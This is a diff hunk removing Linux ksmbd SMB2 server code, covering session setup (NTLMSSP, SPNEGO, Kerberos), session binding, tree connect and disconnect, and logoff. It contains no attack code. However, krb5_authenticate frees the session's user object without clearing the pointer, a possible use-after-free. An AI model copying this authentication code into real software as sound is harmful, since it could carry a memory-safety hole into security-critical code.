+-			preauth_sess = ksmbd_preauth_session_alloc(conn, sess->id);
+-			if (!preauth_sess)
+-				return -ENOMEM;
+-		}
+-
+-		preauth_hash = preauth_sess->Preauth_HashValue;
+-	} else {
+-		if (!sess->Preauth_HashValue)
+-			if (alloc_preauth_hash(sess, conn))
+-				return -ENOMEM;
+-		preauth_hash = sess->Preauth_HashValue;
+-	}
+-
+-	ksmbd_gen_preauth_integrity_hash(conn, work->request_buf, preauth_hash);
+-	return 0;
+-}
+-
+-static int decode_negotiation_token(struct ksmbd_conn *conn,
+-				    struct negotiate_message *negblob,
+-				    size_t sz)
+-{
+-	if (!conn->use_spnego)
+-		return -EINVAL;
+-
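+-	/*
+-	 * If the blob is neither negTokenInit nor negTokenTarg, treat it
+-	 * as raw NTLMSSP and drop the SPNEGO wrapping.
+-	 */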
+-	if (ksmbd_decode_negTokenInit((char *)negblob, sz, conn)) {
+-		if (ksmbd_decode_negTokenTarg((char *)negblob, sz, conn)) {
+-			conn->auth_mechs |= KSMBD_AUTH_NTLMSSP;
+-			conn->preferred_auth_mech = KSMBD_AUTH_NTLMSSP;
+-			conn->use_spnego = false;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static int ntlm_negotiate(struct ksmbd_work *work,
+-			  struct negotiate_message *negblob,
+-			  size_t negblob_len)
+-{
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct challenge_message *chgblob;
+-	unsigned char *spnego_blob = NULL;
+-	u16 spnego_blob_len;
+-	char *neg_blob;
+-	int sz, rc;
+-
+-	ksmbd_debug(SMB, "negotiate phase\n");
+-	rc = ksmbd_decode_ntlmssp_neg_blob(negblob, negblob_len, work->conn);
+-	if (rc)
+-		return rc;
+-
+-	sz = le16_to_cpu(rsp->SecurityBufferOffset);
+-	chgblob =
+-		(struct challenge_message *)((char *)&rsp->hdr.ProtocolId + sz);
+-	memset(chgblob, 0, sizeof(struct challenge_message));
+-
+-	if (!work->conn->use_spnego) {
+-		sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
+-		if (sz < 0)
+-			return -ENOMEM;
+-
+-		rsp->SecurityBufferLength = cpu_to_le16(sz);
+-		return 0;
+-	}
+-
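+-	/*
+-	 * SPNEGO path: build the NTLMSSP CHALLENGE in a scratch buffer,
+-	 * wrap it in a negTokenTarg, then copy the wrapped blob into the
+-	 * response security buffer.
+-	 */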
+-	sz = sizeof(struct challenge_message);
+-	sz += (strlen(ksmbd_netbios_name()) * 2 + 1 + 4) * 6;
+-
+-	neg_blob = kzalloc(sz, GFP_KERNEL);
+-	if (!neg_blob)
+-		return -ENOMEM;
+-
+-	chgblob = (struct challenge_message *)neg_blob;
+-	sz = ksmbd_build_ntlmssp_challenge_blob(chgblob, work->conn);
+-	if (sz < 0) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	rc = build_spnego_ntlmssp_neg_blob(&spnego_blob, &spnego_blob_len,
+-					   neg_blob, sz);
+-	if (rc) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	sz = le16_to_cpu(rsp->SecurityBufferOffset);
+-	memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
+-	rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
+-
+-out:
+-	kfree(spnego_blob);
+-	kfree(neg_blob);
+-	return rc;
+-}
+-
+-static struct authenticate_message *user_authblob(struct ksmbd_conn *conn,
+-						  struct smb2_sess_setup_req *req)
+-{
+-	int sz;
+-
+-	if (conn->use_spnego && conn->mechToken)
+-		return (struct authenticate_message *)conn->mechToken;
+-
+-	sz = le16_to_cpu(req->SecurityBufferOffset);
+-	return (struct authenticate_message *)((char *)&req->hdr.ProtocolId
+-					       + sz);
+-}
+-
+-static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+-				       struct smb2_sess_setup_req *req)
+-{
+-	struct authenticate_message *authblob;
+-	struct ksmbd_user *user;
+-	char *name;
+-	unsigned int name_off, name_len, secbuf_len;
+-
+-	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
+-	if (secbuf_len < sizeof(struct authenticate_message)) {
+-		ksmbd_debug(SMB, "blob len %d too small\n", secbuf_len);
+-		return NULL;
+-	}
+-	authblob = user_authblob(conn, req);
+-	name_off = le32_to_cpu(authblob->UserName.BufferOffset);
+-	name_len = le16_to_cpu(authblob->UserName.Length);
+-
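+-	/* The username must lie entirely within the security buffer. */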
+-	if (secbuf_len < (u64)name_off + name_len)
+-		return NULL;
+-
+-	name = smb_strndup_from_utf16((const char *)authblob + name_off,
+-				      name_len,
+-				      true,
+-				      conn->local_nls);
+-	if (IS_ERR(name)) {
+-		pr_err("cannot allocate memory\n");
+-		return NULL;
+-	}
+-
+-	ksmbd_debug(SMB, "session setup request for user %s\n", name);
+-	user = ksmbd_login_user(name);
+-	kfree(name);
+-	return user;
+-}
+-
+-static int ntlm_authenticate(struct ksmbd_work *work)
+-{
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	struct channel *chann = NULL;
+-	struct ksmbd_user *user;
+-	u64 prev_id;
+-	int sz, rc;
+-
+-	ksmbd_debug(SMB, "authenticate phase\n");
+-	if (conn->use_spnego) {
+-		unsigned char *spnego_blob;
+-		u16 spnego_blob_len;
+-
+-		rc = build_spnego_ntlmssp_auth_blob(&spnego_blob,
+-						    &spnego_blob_len,
+-						    0);
+-		if (rc)
+-			return -ENOMEM;
+-
+-		sz = le16_to_cpu(rsp->SecurityBufferOffset);
+-		memcpy((char *)&rsp->hdr.ProtocolId + sz, spnego_blob, spnego_blob_len);
+-		rsp->SecurityBufferLength = cpu_to_le16(spnego_blob_len);
+-		kfree(spnego_blob);
+-		inc_rfc1001_len(work->response_buf, spnego_blob_len - 1);
+-	}
+-
+-	user = session_user(conn, req);
+-	if (!user) {
+-		ksmbd_debug(SMB, "Unknown user name or an error\n");
+-		return -EPERM;
+-	}
+-
+-	/* Check for previous session */
+-	prev_id = le64_to_cpu(req->PreviousSessionId);
+-	if (prev_id && prev_id != sess->id)
+-		destroy_previous_session(conn, user, prev_id);
+-
+-	if (sess->state == SMB2_SESSION_VALID) {
+-		/*
+-		 * Reuse the session if an anonymous user tries to
+-		 * connect on reauthentication.
+-		 */
+-		if (conn->binding == false && ksmbd_anonymous_user(user)) {
+-			ksmbd_free_user(user);
+-			return 0;
+-		}
+-
+-		if (!ksmbd_compare_user(sess->user, user)) {
+-			ksmbd_free_user(user);
+-			return -EPERM;
+-		}
+-		ksmbd_free_user(user);
+-	} else {
+-		sess->user = user;
+-	}
+-
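+-	/* Guest logins (no binding) skip NTLMSSP blob verification. */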
+-	if (conn->binding == false && user_guest(sess->user)) {
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_IS_GUEST_LE;
+-	} else {
+-		struct authenticate_message *authblob;
+-
+-		authblob = user_authblob(conn, req);
+-		sz = le16_to_cpu(req->SecurityBufferLength);
+-		rc = ksmbd_decode_ntlmssp_auth_blob(authblob, sz, conn, sess);
+-		if (rc) {
+-			set_user_flag(sess->user, KSMBD_USER_FLAG_BAD_PASSWORD);
+-			ksmbd_debug(SMB, "authentication failed\n");
+-			return -EPERM;
+-		}
+-	}
+-
+-	/*
+-	 * If the session state is SMB2_SESSION_VALID, we can assume
+-	 * this is reauthentication. The user/password has already
+-	 * been verified, so return here.
+-	 */
+-	if (sess->state == SMB2_SESSION_VALID) {
+-		if (conn->binding)
+-			goto binding_session;
+-		return 0;
+-	}
+-
+-	if ((rsp->SessionFlags != SMB2_SESSION_FLAG_IS_GUEST_LE &&
+-	     (conn->sign || server_conf.enforced_signing)) ||
+-	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
+-		sess->sign = true;
+-
+-	if (smb3_encryption_negotiated(conn) &&
+-			!(req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
+-		rc = conn->ops->generate_encryptionkey(conn, sess);
+-		if (rc) {
+-			ksmbd_debug(SMB,
+-					"SMB3 encryption key generation failed\n");
+-			return -EINVAL;
+-		}
+-		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+-		/*
+-		 * signing is disabled if encryption is enabled
+-		 * on this session
+-		 */
+-		sess->sign = false;
+-	}
+-
+-binding_session:
+-	if (conn->dialect >= SMB30_PROT_ID) {
+-		chann = lookup_chann_list(sess, conn);
+-		if (!chann) {
+-			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+-			if (!chann)
+-				return -ENOMEM;
+-
+-			chann->conn = conn;
+-			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+-		}
+-	}
+-
+-	if (conn->ops->generate_signingkey) {
+-		rc = conn->ops->generate_signingkey(sess, conn);
+-		if (rc) {
+-			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (!ksmbd_conn_lookup_dialect(conn)) {
+-		pr_err("fail to verify the dialect\n");
+-		return -ENOENT;
+-	}
+-	return 0;
+-}
+-
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-static int krb5_authenticate(struct ksmbd_work *work)
+-{
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_conn *conn = work->conn;
+-	struct ksmbd_session *sess = work->sess;
+-	char *in_blob, *out_blob;
+-	struct channel *chann = NULL;
+-	u64 prev_sess_id;
+-	int in_len, out_len;
+-	int retval;
+-
+-	in_blob = (char *)&req->hdr.ProtocolId +
+-		le16_to_cpu(req->SecurityBufferOffset);
+-	in_len = le16_to_cpu(req->SecurityBufferLength);
+-	out_blob = (char *)&rsp->hdr.ProtocolId +
+-		le16_to_cpu(rsp->SecurityBufferOffset);
+-	out_len = work->response_sz -
+-		(le16_to_cpu(rsp->SecurityBufferOffset) + 4);
+-
+-	/* Check previous session */
+-	prev_sess_id = le64_to_cpu(req->PreviousSessionId);
+-	if (prev_sess_id && prev_sess_id != sess->id)
+-		destroy_previous_session(conn, sess->user, prev_sess_id);
+-
+-	if (sess->state == SMB2_SESSION_VALID)
+-		ksmbd_free_user(sess->user);
+-
+-	retval = ksmbd_krb5_authenticate(sess, in_blob, in_len,
+-					 out_blob, &out_len);
+-	if (retval) {
+-		ksmbd_debug(SMB, "krb5 authentication failed\n");
+-		return -EINVAL;
+-	}
+-	rsp->SecurityBufferLength = cpu_to_le16(out_len);
+-	inc_rfc1001_len(work->response_buf, out_len - 1);
+-
+-	if ((conn->sign || server_conf.enforced_signing) ||
+-	    (req->SecurityMode & SMB2_NEGOTIATE_SIGNING_REQUIRED))
+-		sess->sign = true;
+-
+-	if (smb3_encryption_negotiated(conn)) {
+-		retval = conn->ops->generate_encryptionkey(conn, sess);
+-		if (retval) {
+-			ksmbd_debug(SMB,
+-				    "SMB3 encryption key generation failed\n");
+-			return -EINVAL;
+-		}
+-		sess->enc = true;
+-		rsp->SessionFlags = SMB2_SESSION_FLAG_ENCRYPT_DATA_LE;
+-		sess->sign = false;
+-	}
+-
+-	if (conn->dialect >= SMB30_PROT_ID) {
+-		chann = lookup_chann_list(sess, conn);
+-		if (!chann) {
+-			chann = kmalloc(sizeof(struct channel), GFP_KERNEL);
+-			if (!chann)
+-				return -ENOMEM;
+-
+-			chann->conn = conn;
+-			xa_store(&sess->ksmbd_chann_list, (long)conn, chann, GFP_KERNEL);
+-		}
+-	}
+-
+-	if (conn->ops->generate_signingkey) {
+-		retval = conn->ops->generate_signingkey(sess, conn);
+-		if (retval) {
+-			ksmbd_debug(SMB, "SMB3 signing key generation failed\n");
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (!ksmbd_conn_lookup_dialect(conn)) {
+-		pr_err("fail to verify the dialect\n");
+-		return -ENOENT;
+-	}
+-	return 0;
+-}
+-#else
+-static int krb5_authenticate(struct ksmbd_work *work)
+-{
+-	return -EOPNOTSUPP;
+-}
+-#endif
+-
+-int smb2_sess_setup(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_sess_setup_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_sess_setup_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess;
+-	struct negotiate_message *negblob;
+-	unsigned int negblob_len, negblob_off;
+-	int rc = 0;
+-
+-	ksmbd_debug(SMB, "Received request for session setup\n");
+-
+-	rsp->StructureSize = cpu_to_le16(9);
+-	rsp->SessionFlags = 0;
+-	rsp->SecurityBufferOffset = cpu_to_le16(72);
+-	rsp->SecurityBufferLength = 0;
+-	inc_rfc1001_len(work->response_buf, 9);
+-
+-	ksmbd_conn_lock(conn);
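+-	/*
+-	 * A zero SessionId starts a new session; a BINDING request (on
+-	 * SMB 3.0+ with multichannel enabled) attaches another channel
+-	 * to an existing session; anything else continues or
+-	 * reauthenticates an existing session.
+-	 */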
+-	if (!req->hdr.SessionId) {
+-		sess = ksmbd_smb2_session_create();
+-		if (!sess) {
+-			rc = -ENOMEM;
+-			goto out_err;
+-		}
+-		rsp->hdr.SessionId = cpu_to_le64(sess->id);
+-		rc = ksmbd_session_register(conn, sess);
+-		if (rc)
+-			goto out_err;
+-	} else if (conn->dialect >= SMB30_PROT_ID &&
+-		   (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+-		   req->Flags & SMB2_SESSION_REQ_FLAG_BINDING) {
+-		u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+-
+-		sess = ksmbd_session_lookup_slowpath(sess_id);
+-		if (!sess) {
+-			rc = -ENOENT;
+-			goto out_err;
+-		}
+-
+-		if (conn->dialect != sess->dialect) {
+-			rc = -EINVAL;
+-			goto out_err;
+-		}
+-
+-		if (!(req->hdr.Flags & SMB2_FLAGS_SIGNED)) {
+-			rc = -EINVAL;
+-			goto out_err;
+-		}
+-
+-		if (strncmp(conn->ClientGUID, sess->ClientGUID,
+-			    SMB2_CLIENT_GUID_SIZE)) {
+-			rc = -ENOENT;
+-			goto out_err;
+-		}
+-
+-		if (sess->state == SMB2_SESSION_IN_PROGRESS) {
+-			rc = -EACCES;
+-			goto out_err;
+-		}
+-
+-		if (sess->state == SMB2_SESSION_EXPIRED) {
+-			rc = -EFAULT;
+-			goto out_err;
+-		}
+-
+-		if (ksmbd_conn_need_reconnect(conn)) {
+-			rc = -EFAULT;
+-			sess = NULL;
+-			goto out_err;
+-		}
+-
+-		if (ksmbd_session_lookup(conn, sess_id)) {
+-			rc = -EACCES;
+-			goto out_err;
+-		}
+-
+-		if (user_guest(sess->user)) {
+-			rc = -EOPNOTSUPP;
+-			goto out_err;
+-		}
+-
+-		conn->binding = true;
+-	} else if ((conn->dialect < SMB30_PROT_ID ||
+-		    server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+-		   (req->Flags & SMB2_SESSION_REQ_FLAG_BINDING)) {
+-		sess = NULL;
+-		rc = -EACCES;
+-		goto out_err;
+-	} else {
+-		sess = ksmbd_session_lookup(conn,
+-					    le64_to_cpu(req->hdr.SessionId));
+-		if (!sess) {
+-			rc = -ENOENT;
+-			goto out_err;
+-		}
+-
+-		if (sess->state == SMB2_SESSION_EXPIRED) {
+-			rc = -EFAULT;
+-			goto out_err;
+-		}
+-
+-		if (ksmbd_conn_need_reconnect(conn)) {
+-			rc = -EFAULT;
+-			sess = NULL;
+-			goto out_err;
+-		}
+-	}
+-	work->sess = sess;
+-
+-	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+-	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+-	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+-	    negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
+-		rc = -EINVAL;
+-		goto out_err;
+-	}
+-
+-	negblob = (struct negotiate_message *)((char *)&req->hdr.ProtocolId +
+-			negblob_off);
+-
+-	if (decode_negotiation_token(conn, negblob, negblob_len) == 0) {
+-		if (conn->mechToken)
+-			negblob = (struct negotiate_message *)conn->mechToken;
+-	}
+-
+-	if (server_conf.auth_mechs & conn->auth_mechs) {
+-		rc = generate_preauth_hash(work);
+-		if (rc)
+-			goto out_err;
+-
+-		if (conn->preferred_auth_mech &
+-				(KSMBD_AUTH_KRB5 | KSMBD_AUTH_MSKRB5)) {
+-			rc = krb5_authenticate(work);
+-			if (rc) {
+-				rc = -EINVAL;
+-				goto out_err;
+-			}
+-
+-			if (!ksmbd_conn_need_reconnect(conn)) {
+-				ksmbd_conn_set_good(conn);
+-				sess->state = SMB2_SESSION_VALID;
+-			}
+-			kfree(sess->Preauth_HashValue);
+-			sess->Preauth_HashValue = NULL;
+-		} else if (conn->preferred_auth_mech == KSMBD_AUTH_NTLMSSP) {
+-			if (negblob->MessageType == NtLmNegotiate) {
+-				rc = ntlm_negotiate(work, negblob, negblob_len);
+-				if (rc)
+-					goto out_err;
+-				rsp->hdr.Status =
+-					STATUS_MORE_PROCESSING_REQUIRED;
+-				/*
+-				 * Note: total size - 1 is used here to
+-				 * adjust for the zero-size blob placeholder.
+-				 */
+-				inc_rfc1001_len(work->response_buf,
+-						le16_to_cpu(rsp->SecurityBufferLength) - 1);
+-
+-			} else if (negblob->MessageType == NtLmAuthenticate) {
+-				rc = ntlm_authenticate(work);
+-				if (rc)
+-					goto out_err;
+-
+-				if (!ksmbd_conn_need_reconnect(conn)) {
+-					ksmbd_conn_set_good(conn);
+-					sess->state = SMB2_SESSION_VALID;
+-				}
+-				if (conn->binding) {
+-					struct preauth_session *preauth_sess;
+-
+-					preauth_sess =
+-						ksmbd_preauth_session_lookup(conn, sess->id);
+-					if (preauth_sess) {
+-						list_del(&preauth_sess->preauth_entry);
+-						kfree(preauth_sess);
+-					}
+-				}
+-				kfree(sess->Preauth_HashValue);
+-				sess->Preauth_HashValue = NULL;
+-			} else {
+-				pr_info_ratelimited("Unknown NTLMSSP message type : 0x%x\n",
+-						le32_to_cpu(negblob->MessageType));
+-				rc = -EINVAL;
+-			}
+-		} else {
+-			/* TODO: need one more negotiation */
+-			pr_err("Not support the preferred authentication\n");
+-			rc = -EINVAL;
+-		}
+-	} else {
+-		pr_err("Not support authentication\n");
+-		rc = -EINVAL;
+-	}
+-
+-out_err:
+-	if (rc == -EINVAL)
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-	else if (rc == -ENOENT)
+-		rsp->hdr.Status = STATUS_USER_SESSION_DELETED;
+-	else if (rc == -EACCES)
+-		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
+-	else if (rc == -EFAULT)
+-		rsp->hdr.Status = STATUS_NETWORK_SESSION_EXPIRED;
+-	else if (rc == -ENOMEM)
+-		rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
+-	else if (rc == -EOPNOTSUPP)
+-		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
+-	else if (rc)
+-		rsp->hdr.Status = STATUS_LOGON_FAILURE;
+-
+-	if (conn->use_spnego && conn->mechToken) {
+-		kfree(conn->mechToken);
+-		conn->mechToken = NULL;
+-	}
+-
+-	if (rc < 0) {
+-		/*
+-		 * SecurityBufferOffset should be set to zero
+-		 * in session setup error response.
+-		 */
+-		rsp->SecurityBufferOffset = 0;
+-
+-		if (sess) {
+-			bool try_delay = false;
+-
+-			/*
+-			 * To deter dictionary attacks (rapidly repeated session
+-			 * setup requests), ksmbd delays for 5 seconds on session
+-			 * setup failure, making it harder to send enough random
+-			 * connection requests to break into a server.
+-			 */
+-			if (sess->user && sess->user->flags & KSMBD_USER_FLAG_DELAY_SESSION)
+-				try_delay = true;
+-
+-			sess->last_active = jiffies;
+-			sess->state = SMB2_SESSION_EXPIRED;
+-			if (try_delay) {
+-				ksmbd_conn_set_need_reconnect(conn);
+-				ssleep(5);
+-				ksmbd_conn_set_need_negotiate(conn);
+-			}
+-		}
+-	}
+-
+-	ksmbd_conn_unlock(conn);
+-	return rc;
+-}
+-
+-/**
+- * smb2_tree_connect() - handler for smb2 tree connect command
+- * @work:	smb work containing smb request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-int smb2_tree_connect(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_tree_connect_req *req = smb2_get_msg(work->request_buf);
+-	struct smb2_tree_connect_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
+-	char *treename = NULL, *name = NULL;
+-	struct ksmbd_tree_conn_status status;
+-	struct ksmbd_share_config *share;
+-	int rc = -EINVAL;
+-
+-	treename = smb_strndup_from_utf16(req->Buffer,
+-					  le16_to_cpu(req->PathLength), true,
+-					  conn->local_nls);
+-	if (IS_ERR(treename)) {
+-		pr_err("treename is NULL\n");
+-		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
+-		goto out_err1;
+-	}
+-
+-	name = ksmbd_extract_sharename(conn->um, treename);
+-	if (IS_ERR(name)) {
+-		status.ret = KSMBD_TREE_CONN_STATUS_ERROR;
+-		goto out_err1;
+-	}
+-
+-	ksmbd_debug(SMB, "tree connect request for tree %s treename %s\n",
+-		    name, treename);
+-
+-	status = ksmbd_tree_conn_connect(conn, sess, name);
+-	if (status.ret == KSMBD_TREE_CONN_STATUS_OK)
+-		rsp->hdr.Id.SyncId.TreeId = cpu_to_le32(status.tree_conn->id);
+-	else
+-		goto out_err1;
+-
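+-	/*
+-	 * Advertise MaximalAccess: IPC shares get a fixed pipe access
+-	 * mask, while disk shares start read-only and gain write/delete
+-	 * bits only when the tree connect is writable.
+-	 */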
+-	share = status.tree_conn->share_conf;
+-	if (test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		ksmbd_debug(SMB, "IPC share path request\n");
+-		rsp->ShareType = SMB2_SHARE_TYPE_PIPE;
+-		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
+-			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE |
+-			FILE_DELETE_LE | FILE_READ_CONTROL_LE |
+-			FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
+-			FILE_SYNCHRONIZE_LE;
+-	} else {
+-		rsp->ShareType = SMB2_SHARE_TYPE_DISK;
+-		rsp->MaximalAccess = FILE_READ_DATA_LE | FILE_READ_EA_LE |
+-			FILE_EXECUTE_LE | FILE_READ_ATTRIBUTES_LE;
+-		if (test_tree_conn_flag(status.tree_conn,
+-					KSMBD_TREE_CONN_FLAG_WRITABLE)) {
+-			rsp->MaximalAccess |= FILE_WRITE_DATA_LE |
+-				FILE_APPEND_DATA_LE | FILE_WRITE_EA_LE |
+-				FILE_DELETE_LE | FILE_WRITE_ATTRIBUTES_LE |
+-				FILE_DELETE_CHILD_LE | FILE_READ_CONTROL_LE |
+-				FILE_WRITE_DAC_LE | FILE_WRITE_OWNER_LE |
+-				FILE_SYNCHRONIZE_LE;
+-		}
+-	}
+-
+-	status.tree_conn->maximal_access = le32_to_cpu(rsp->MaximalAccess);
+-	if (conn->posix_ext_supported)
+-		status.tree_conn->posix_extensions = true;
+-
+-	rsp->StructureSize = cpu_to_le16(16);
+-	inc_rfc1001_len(work->response_buf, 16);
+-out_err1:
+-	rsp->Capabilities = 0;
+-	rsp->Reserved = 0;
+-	/* default manual caching */
+-	rsp->ShareFlags = SMB2_SHAREFLAG_MANUAL_CACHING;
+-
+-	if (!IS_ERR(treename))
+-		kfree(treename);
+-	if (!IS_ERR(name))
+-		kfree(name);
+-
+-	switch (status.ret) {
+-	case KSMBD_TREE_CONN_STATUS_OK:
+-		rsp->hdr.Status = STATUS_SUCCESS;
+-		rc = 0;
+-		break;
+-	case -ESTALE:
+-	case -ENOENT:
+-	case KSMBD_TREE_CONN_STATUS_NO_SHARE:
+-		rsp->hdr.Status = STATUS_BAD_NETWORK_NAME;
+-		break;
+-	case -ENOMEM:
+-	case KSMBD_TREE_CONN_STATUS_NOMEM:
+-		rsp->hdr.Status = STATUS_NO_MEMORY;
+-		break;
+-	case KSMBD_TREE_CONN_STATUS_ERROR:
+-	case KSMBD_TREE_CONN_STATUS_TOO_MANY_CONNS:
+-	case KSMBD_TREE_CONN_STATUS_TOO_MANY_SESSIONS:
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-		break;
+-	case -EINVAL:
+-		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
+-		break;
+-	default:
+-		rsp->hdr.Status = STATUS_ACCESS_DENIED;
+-	}
+-
+-	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
+-		smb2_set_err_rsp(work);
+-
+-	return rc;
+-}
+-
+-/**
+- * smb2_create_open_flags() - convert smb open flags to unix open flags
+- * @file_present:	is file already present
+- * @access:		file access flags
+- * @disposition:	file disposition flags
+- * @may_flags:		set with MAY_ flags
+- *
+- * Return:      file open flags
+- */
+-static int smb2_create_open_flags(bool file_present, __le32 access,
+-				  __le32 disposition,
+-				  int *may_flags)
+-{
+-	int oflags = O_NONBLOCK | O_LARGEFILE;
+-
+-	if (access & FILE_READ_DESIRED_ACCESS_LE &&
+-	    access & FILE_WRITE_DESIRE_ACCESS_LE) {
+-		oflags |= O_RDWR;
+-		*may_flags = MAY_OPEN | MAY_READ | MAY_WRITE;
+-	} else if (access & FILE_WRITE_DESIRE_ACCESS_LE) {
+-		oflags |= O_WRONLY;
+-		*may_flags = MAY_OPEN | MAY_WRITE;
+-	} else {
+-		oflags |= O_RDONLY;
+-		*may_flags = MAY_OPEN | MAY_READ;
+-	}
+-
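+-	/* An attributes-only open is mapped to O_PATH (no data access). */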
+-	if (access == FILE_READ_ATTRIBUTES_LE)
+-		oflags |= O_PATH;
+-
+-	if (file_present) {
+-		switch (disposition & FILE_CREATE_MASK_LE) {
+-		case FILE_OPEN_LE:
+-		case FILE_CREATE_LE:
+-			break;
+-		case FILE_SUPERSEDE_LE:
+-		case FILE_OVERWRITE_LE:
+-		case FILE_OVERWRITE_IF_LE:
+-			oflags |= O_TRUNC;
+-			break;
+-		default:
+-			break;
+-		}
+-	} else {
+-		switch (disposition & FILE_CREATE_MASK_LE) {
+-		case FILE_SUPERSEDE_LE:
+-		case FILE_CREATE_LE:
+-		case FILE_OPEN_IF_LE:
+-		case FILE_OVERWRITE_IF_LE:
+-			oflags |= O_CREAT;
+-			break;
+-		case FILE_OPEN_LE:
+-		case FILE_OVERWRITE_LE:
+-			oflags &= ~O_CREAT;
+-			break;
+-		default:
+-			break;
+-		}
+-	}
+-
+-	return oflags;
+-}
+-
+-/**
+- * smb2_tree_disconnect() - handler for smb tree disconnect request
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0
+- */
+-int smb2_tree_disconnect(struct ksmbd_work *work)
+-{
+-	struct smb2_tree_disconnect_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_tree_connect *tcon = work->tcon;
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+-	ksmbd_debug(SMB, "request\n");
+-
+-	if (!tcon || test_and_set_bit(TREE_CONN_EXPIRE, &tcon->status)) {
+-		struct smb2_tree_disconnect_req *req =
+-			smb2_get_msg(work->request_buf);
+-
+-		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+-
+-		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+-		smb2_set_err_rsp(work);
+-		return 0;
+-	}
+-
+-	ksmbd_close_tree_conn_fds(work);
+-	ksmbd_tree_conn_disconnect(sess, tcon);
+-	work->tcon = NULL;
+-	return 0;
+-}
+-
+-/**
+- * smb2_session_logoff() - handler for session log off request
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0
+- */
+-int smb2_session_logoff(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_logoff_rsp *rsp = smb2_get_msg(work->response_buf);
+-	struct ksmbd_session *sess;
+-	struct smb2_logoff_req *req = smb2_get_msg(work->request_buf);
+-	u64 sess_id = le64_to_cpu(req->hdr.SessionId);
+-
+-	rsp->StructureSize = cpu_to_le16(4);
+-	inc_rfc1001_len(work->response_buf, 4);
+-
+-	ksmbd_debug(SMB, "request\n");
+-
+-	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_RECONNECT);
+-	ksmbd_close_session_fds(work);
+-	ksmbd_conn_wait_idle(conn, sess_id);
+-
+-	/*
+-	 * Re-lookup the session to check whether it was deleted
+-	 * while waiting for the request to complete.
+-	 */
+-	sess = ksmbd_session_lookup_all(conn, sess_id);
+-	if (ksmbd_tree_conn_session_logoff(sess)) {
+-		ksmbd_debug(SMB, "Invalid tid %d\n", req->hdr.Id.SyncId.TreeId);
+-		rsp->hdr.Status = STATUS_NETWORK_NAME_DELETED;
+-		smb2_set_err_rsp(work);
+-		return 0;
+-	}
+-
+-	ksmbd_destroy_file_table(&sess->file_table);
+-	sess->state = SMB2_SESSION_EXPIRED;
+-
+-	ksmbd_free_user(sess->user);
+-	sess->user = NULL;
+-	ksmbd_all_conn_set_status(sess_id, KSMBD_SESS_NEED_NEGOTIATE);
+-	return 0;
+-}
+-
+-/**
+- * create_smb2_pipe() - create IPC pipe
+- * @work:	smb work containing request buffer
+- *
+- * Return:      0 on success, otherwise error
+- */
+-static noinline int create_smb2_pipe(struct ksmbd_work *work)
+-{
+-	struct smb2_create_rsp *rsp = smb2_get_msg(work->response_buf);
